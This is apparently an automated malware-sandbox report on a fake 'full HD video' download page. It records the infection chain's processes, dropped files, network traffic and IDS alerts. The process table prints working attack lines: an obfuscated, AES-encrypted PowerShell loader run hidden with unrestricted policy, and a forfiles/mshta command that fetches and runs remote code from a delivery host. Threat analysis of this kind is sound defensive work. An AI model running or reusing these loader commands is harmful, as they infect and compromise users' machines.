| URL: | https://StreamVideoz.b-cdn.net/Download-Full-Video-HD1.html |
| Full analysis: | https://app.any.run/tasks/1497a11e-976f-40b6-b1a0-298848da09ed |
| Verdict: | Malicious activity |
| Analysis date: | June 13, 2024, 12:37:02 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 2570510091578DCB99D4D86CA593355C |
| SHA1: | 6B0C40E4909984714A7B7C9A26FF5A38E04CAD16 |
| SHA256: | F3699DD73B4297A78324C6D5CD5ED68F1362AF41E58C9E564D027D09B3FAA428 |
| SSDEEP: | 3:N8YTIEvhgEZ+sJGzAvQhuIJ:2UIEZgCfGzvhuIJ |
MALICIOUS
Drops the executable file immediately after the start
- mshta.exe (PID: 2168)
- powershell.exe (PID: 600)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 600)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 600)
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 2168)
Run PowerShell with an invisible window
- powershell.exe (PID: 600)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 600)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 600)
Request from PowerShell that ran from MSHTA.EXE
- powershell.exe (PID: 600)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 600)
SUSPICIOUS
Uses pipe srvsvc via SMB (transferring data)
- iexplore.exe (PID: 4032)
Searches and executes a command on selected files
- forfiles.exe (PID: 2332)
Starts POWERSHELL.EXE for commands execution
- forfiles.exe (PID: 2332)
- mshta.exe (PID: 2168)
Reads the Internet Settings
- mshta.exe (PID: 2168)
- powershell.exe (PID: 600)
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 2168)
Executable content was dropped or overwritten
- mshta.exe (PID: 2168)
- powershell.exe (PID: 600)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 2168)
Process drops legitimate windows executable
- mshta.exe (PID: 2168)
Adds/modifies Windows certificates
- mshta.exe (PID: 2168)
Base64-obfuscated command line is found
- mshta.exe (PID: 2168)
Cryptography encrypted command line is found
- powershell.exe (PID: 600)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 600)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 600)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 600)
Gets file extension (POWERSHELL)
- powershell.exe (PID: 600)
The process creates files with name similar to system file names
- powershell.exe (PID: 600)
Uses RUNDLL32.EXE to load library
- powershell.exe (PID: 600)
INFO
Manual execution by a user
- wmpnscfg.exe (PID: 660)
- forfiles.exe (PID: 2332)
Application launched itself
- iexplore.exe (PID: 3968)
Reads the computer name
- wmpnscfg.exe (PID: 660)
- vlc.exe (PID: 2428)
Checks supported languages
- wmpnscfg.exe (PID: 660)
- vlc.exe (PID: 2428)
Checks proxy server information
- mshta.exe (PID: 2168)
Reads security settings of Internet Explorer
- powershell.exe (PID: 2464)
Reads Internet Explorer settings
- mshta.exe (PID: 2168)
- powershell.exe (PID: 600)
Create files in a temporary directory
- powershell.exe (PID: 2464)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 600)
Gets data length (POWERSHELL)
- powershell.exe (PID: 600)
Disables trace logs
- powershell.exe (PID: 600)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 600)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
49
Monitored processes
9
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 600 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ffQiHkvB($LpAs){return -split ($LpAs -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$xMaLNwL = ffQiHkvB('2319245FD48C66D76FC89F9C99D5E857EB6F754A01719C2716960A67C272DE45298052669A3E7FDC354527F866D0CFB427707F187F003975C7BD6FE92D63A5C8CF57FC00BD2FAB405E15590D6BA6A78AF390557942B9FA866633F0F0F086903D60D789C62F1F60A2E9E7944845574961467035A1872499668FF1C71CDE0472855CB43C4B1B50BA18A14A2BEDC171B28ABB9ED106DF460A48934714F1692E1AE13B7652628D6598258517847BA727975C949CF2CC5A18D84D8772E985B3AAA13C88A0E28D6E8FFB565E0EDF340A2E6A539A6DE3C2CCDF8CE6CEDF31568465D2A5F7FBD7930D4587E7DA04D446421FED37BB3052B408A75465E83FD1B9C008BA65644187C96548BD9DF458F6E7E2FC04C3E357B8CE677E487E749592A855A466C15EAC9B6644A922495D538FA114AB6DA91D8546279ED9A3CE250D6C4FF6E684538927E842F5F01B4D96FABE6274B7006CD2829E8017CB1AAD330F61E14C6EC6C8A18A6D1F75389E371E7406B98E0DC4D605521925ECD1C2A38D07EBC8F2034237B0F2FBDD7D4C94B37374A7463EC34E73D478CA5DF801FC68CFF4BD491B28F31FBC2E0FD6A84A99E7991CD42703ADA402D2308819AB67B94D2B8F874EABC1A6F11A189DA68436F126B3350004BAFDA880CAED72DAF6DC38AC32706BA153E15859AB8512ACADAE1B30E0CCB37D4294E2FCC7A1CECC731812ABE057EE85658868B65A7C15152A6EE8B1E36633BAF4571086A0D40CD7EA788456AB9A9EAFD4E7A7810C8C9C218685509AB36DB3D481F7450CDE3A323483B69A94489FE4DD8AB096A883AF5D168697370D5C0A1B13B9407AA6F0046F96C407A4EA117B862F9F03FEC18438F40110B925819A21FBBBB5E7AAA37CD370F685A86DA53FF272201E5FCD9BC95996E9E87F866D3007802915916A32AA349068C7746DE6579697F716166A132B0488632B0BA94F03D65155D3A0BFCE221D3F75BE68C17180F7A3C26ED6CB9F26E923177AAFF728E1DF5104EAB605B0B555EE458D0583466F509CD00923913AD5767BF84A3694665506246D9A08BE349EF210221F157F053F80D5E1DD2ECE618FC8DA8795E3EC9904FEB09ED7FF8C224EDD63251EDA820E3243BFAB90DC41D39352F238DFA271DBC7A3A5D2876B50E12703442208D7655E8721CC377E385AA1002D858BD6BF2A87A1BBEC475121F99E2F57A4AA916BAE443C564268A41B348BBFF8D4EBC66FC759097E1306FBCDF0E972ACA57F9D6A398F258BCEDE42851B67C7C8A8F185AD2A7B9CCFDF1E918240DD85CF7F9116D51360F5CB7C45DE3E594DC323C64A8967BFABFDAEAD7BA8FA9131A0A3BAD3E7F53C877D40EAC07F2A07F64E637905948B2C623FD27D30D7D36C6147923A4B0B2771B600E6BAF286C77E35B8E0CFAF2A5C749483C5466AAE58CADD1C4B1BA97EEB6123EAFCE0B9ED763EBB389DC459783C122CBBE5EB3B061C34A2179CDFBEBABB948ACE4869D964CA8F86D1E02AB80D6C86A9EF293AFBE9D352D1214BA3FBBFC915961F17B30DBFC28F4CF9BC2C0469499DA62A83CE749E90A15691818EE0D8B1E1231908E9219186F0AF02BC5C61D5E711C7065384B83F6022A53766F5B43CDD979C875CA37D6A781F620952CD11EBC53863D5DEBEF9604AF1EFFC3AACFF0AC608ECFF64E4021FE7DD9D31829123E79A8AB162F13C0F0FAFE7CFD01E5A65DC3DA655C44C5318ED09185EAC87AB00D2E66272B58821AC9AFE24A7904EF459D9E19C0015C277A2768911D178697222CAC6D6C0A8E49EF58D48853CDD4273221EF8B0FEDC2F388A84FF9D938799C2123938A9E200FD6F4D22BB26C989985A78C8D9BE9FEBA5F73C381913C4550892B3F6B23B59C08D98D1B87FDA46BC38865DBF4029AC1D8EDD25E0F37C644FCB62656D65F57C29DEBF627C6BB67E3473AFD4A2BE78076E94AE0453338A2D04FE5B7C49662D660176048591431C9CE4611C8F70385B8B7591B572B4E6D8F6A9AFC4513B43CC38CF38781F566BD1473F1DD240D2A8B1D1B82590D5D97109C9D0C0E8D1EEE399562243F48F2840819EC7086FE9FB41123CD0E5E3917246D51CA4164E4446CDE7F13F985A52F9D5358B6DBC16E40AB4CE5C26C6679BC174A06DAD8C0E299EEE9D3C2A61F074E738504884181E13DCE8EB286EB65BF01E477ACE2864809ADC0FBBDFA65919CFF64410ED6565464A09C3635B5AD35710F758EF865B9C5B2B900F7DF3C83E65EB26F128F9D4F9D7E6942F5C47AD5ACE6265EF271302F269BB7D1B2A4677A935B6958BD06F868D5F0F9C0F8AA3883FC054CB3A3D17D8530126BCB2804CC8A030998F6C12FDEE463436379FDD4284C96C4E80209C9BB564A12F593FBE0E501EB55D8863E35BB050DDC710C110C96CB30BA6F24A7B17BF205017867E887CA9FE5AB9E2BC90128390DC848036EECCFF2AB22E10597C981C0F5AD1C3A0B5DD1A6ED70EF9A4146B76F73A438154A7B0BE8E644FD4E788E009B5CEA4B49A450DF1630B420C87557CC68D2700C44E1663785DADB01545EEB967DAAC4A58A4A7B302FF93413051157B912F737AE3612E74994EA740990F2926');$OIOVH = [System.Security.Cryptography.Aes]::Create();$OIOVH.Key = ffQiHkvB('746A53774B6D6F6F7569476B7041676D');$OIOVH.IV = New-Object byte[] 16;$zSGjOrGR = $OIOVH.CreateDecryptor();$tQOhULjbC = $zSGjOrGR.TransformFinalBlock($xMaLNwL, 0, $xMaLNwL.Length);$FOxZZBmey = [System.Text.Encoding]::Utf8.GetString($tQOhULjbC);$zSGjOrGR.Dispose();& $FOxZZBmey.Substring(0,3) $FOxZZBmey.Substring(3) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 660 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2168 | "C:\Windows\system32\mshta.exe" https://nextomax.b-cdn.net/nexto | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 2332 | "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://nextomax.b-cdn.net/nexto" | C:\Windows\System32\forfiles.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ForFiles - Executes a command on selected files Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2428 | "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Roaming\video.mp4" | C:\Program Files\VideoLAN\VLC\vlc.exe | powershell.exe | ||||||||||||
User: admin Company: VideoLAN Integrity Level: MEDIUM Description: VLC media player Version: 3.0.11 Modules
| |||||||||||||||
| 2464 | . mshta https://nextomax.b-cdn.net/nexto | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | forfiles.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3040 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Roaming\bentonite.cfg | C:\Windows\System32\rundll32.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3968 | "C:\Program Files\Internet Explorer\iexplore.exe" "https://StreamVideoz.b-cdn.net/Download-Full-Video-HD1.html" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 4032 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3968 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
Total events
44 360
Read events
44 091
Write events
183
Delete events
86
Modification events
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPDaysSinceLastAutoMigration |
Value: 1 | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPLastLaunchLowDateTime |
Value: | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPLastLaunchHighDateTime |
Value: 31112590 | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
| Operation: | write | Name: | NextCheckForUpdateLowDateTime |
Value: | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
| Operation: | write | Name: | NextCheckForUpdateHighDateTime |
Value: 31112590 | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (3968) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
Executable files
7
Suspicious files
34
Text files
20
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4032 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | binary | |
MD5:CD74F551238678A7D41DDC54D2EB5F81 | SHA256:3C8B0ED28702CAF2A191F4C3B59D61117F7F46C3A4936BE1DA3F9583E4928195 | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\517B86ABD897C7B2D4ECD67EE3885B86 | binary | |
MD5:5ECD758CD0A5ABD5A7367E28CF4035C8 | SHA256:C4FA681559BDB54313C13AFC2F40F012FF61C26AF4E492EC0835A1B8F937BBBA | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\517B86ABD897C7B2D4ECD67EE3885B86 | der | |
MD5:F7C6139C61F9725427B78C38B8E10D69 | SHA256:6653ECB2F912DD97702A75BA15FAD3478F61E8DB20D47D65F226893CF6B153BE | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:A67B1DCE0EFF3FACF2EC23E2A2702CD0 | SHA256:F5036614871B65D24C67D480C4C68AB2AF49885D7890346B4A3DB87E0887D521 | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\Download-Full-Video-HD1[1].htm | html | |
MD5:7391E6CDB6AF233F02CFEF50E1B68E2C | SHA256:3F1C1CA1DB2F7AECC1A5DD59FC0A86C73CA1F35863A8BD4AF597772C5C51CFAD | |||
| 3968 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EAF8AA29A62AB29E614331747385D816_F9E4DC0B9D5C777357D7DB8DEF51118A | binary | |
MD5:FA27DFF174B98FB1BFB6A5A47F596530 | SHA256:A454FDAF65738FDA82B6341C9175D169B6AF8AE3DFA3631F53D17A2D68F4B36C | |||
| 3968 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EAF8AA29A62AB29E614331747385D816_F9E4DC0B9D5C777357D7DB8DEF51118A | binary | |
MD5:44217547CB5C2D0F8A0773B3C6BE8D3F | SHA256:94ABB0D12CA575F7C88299F3C7D770DAE9E8CAE1435191EEDF1071FC13BAB882 | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E | binary | |
MD5:CF0E5B8121636D7B731B9BA5ACF5F2AE | SHA256:4487333ECDF3319FC9B0226A8835A07BFCA563F1A656884725269C4CB341BB6A | |||
| 3968 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | binary | |
MD5:0C19A9221A9EF4D80AE3CF028FF71408 | SHA256:89D20A41E581C75DFC9D73DB5BB0142DF006B1752811D08B0153E361754B335D | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | binary | |
MD5:AD393E5B7479EFED96650BBB5AD97FFB | SHA256:043F20B8A992ABFD4629EA68FA871C92C4E1F1862C870FC426BB4ED24F903B6E | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
28
TCP/UDP connections
33
DNS requests
24
Threats
8
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4032 | iexplore.exe | GET | 304 | 23.50.131.216:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?30bfcba95dc85498 | unknown | — | — | unknown |
4032 | iexplore.exe | GET | 304 | 23.50.131.200:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?aa27c982be707355 | unknown | — | — | unknown |
4032 | iexplore.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D | unknown | — | — | unknown |
4032 | iexplore.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | unknown | — | — | unknown |
4032 | iexplore.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O | unknown | — | — | unknown |
3968 | iexplore.exe | GET | 304 | 23.50.131.200:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5fc92888093a54f7 | unknown | — | — | unknown |
3968 | iexplore.exe | GET | 304 | 23.50.131.200:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?260f79dbb405aab9 | unknown | — | — | unknown |
3968 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | — | — | unknown |
3968 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
840 | svchost.exe | OPTIONS | 200 | 62.133.61.56:80 | http://62.133.61.56/Downloads | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4032 | iexplore.exe | 169.150.247.34:443 | streamvideoz.b-cdn.net | — | GB | unknown |
4032 | iexplore.exe | 23.50.131.200:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4032 | iexplore.exe | 23.50.131.216:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown |
4032 | iexplore.exe | 172.64.149.23:80 | ocsp.comodoca.com | CLOUDFLARENET | US | unknown |
3968 | iexplore.exe | 169.150.247.34:443 | streamvideoz.b-cdn.net | — | GB | unknown |
3968 | iexplore.exe | 23.50.131.200:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown |
3968 | iexplore.exe | 95.100.146.27:443 | www.bing.com | Akamai International B.V. | CZ | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
streamvideoz.b-cdn.net |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.comodoca.com |
| whitelisted |
ocsp.usertrust.com |
| whitelisted |
ocsp.sectigo.com |
| whitelisted |
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
840 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
840 | svchost.exe | Misc activity | ET INFO LNK File Downloaded via HTTP |
840 | svchost.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] A suspicious Lnk file was downloaded causing the exe file to be executed |
840 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
840 | svchost.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Retrieves Properties of a Lnk file via WebDAV |
840 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
840 | svchost.exe | Misc activity | ET HUNTING Successful PROPFIND Response for Application Media Type |
1 ETPRO signatures available at the full report
Process | Message |
|---|---|
vlc.exe | main libvlc debug: using multimedia timers as clock source
|
vlc.exe | main libvlc debug: VLC media player - 3.0.11 Vetinari
|
vlc.exe | main libvlc debug: loading plugins cache file C:\Program Files\VideoLAN\VLC\plugins\plugins.dat
|
vlc.exe | main libvlc debug: min period: 1 ms, max period: 1000000 ms
|
vlc.exe | main libvlc debug: Copyright © 1996-2020 the VideoLAN team
|
vlc.exe | main libvlc debug: configured with ../extras/package/win32/../../../configure '--enable-update-check' '--enable-lua' '--enable-faad' '--enable-flac' '--enable-theora' '--enable-avcodec' '--enable-merge-ffmpeg' '--enable-dca' '--enable-mpc' '--enable-libass' '--enable-schroedinger' '--enable-realrtsp' '--enable-live555' '--enable-dvdread' '--enable-shout' '--enable-goom' '--enable-caca' '--enable-qt' '--enable-skins2' '--enable-sse' '--enable-mmx' '--enable-libcddb' '--enable-zvbi' '--disable-telx' '--enable-nls' '--host=i686-w64-mingw32' '--with-breakpad=https://win.crashes.videolan.org' 'host_alias=i686-w64-mingw32' 'PKG_CONFIG_LIBDIR=/home/jenkins/workspace/vlc-release/windows/vlc-release-win32-x86/contrib/i686-w64-mingw32/lib/pkgconfig'
|
vlc.exe | main libvlc debug: searching plug-in modules
|
vlc.exe | main libvlc debug: revision 3.0.11-0-gdc0c5ced72
|
vlc.exe | main libvlc debug: recursively browsing `C:\Program Files\VideoLAN\VLC\plugins'
|
vlc.exe | main libvlc error: stale plugins cache: modified C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_concat_plugin.dll
|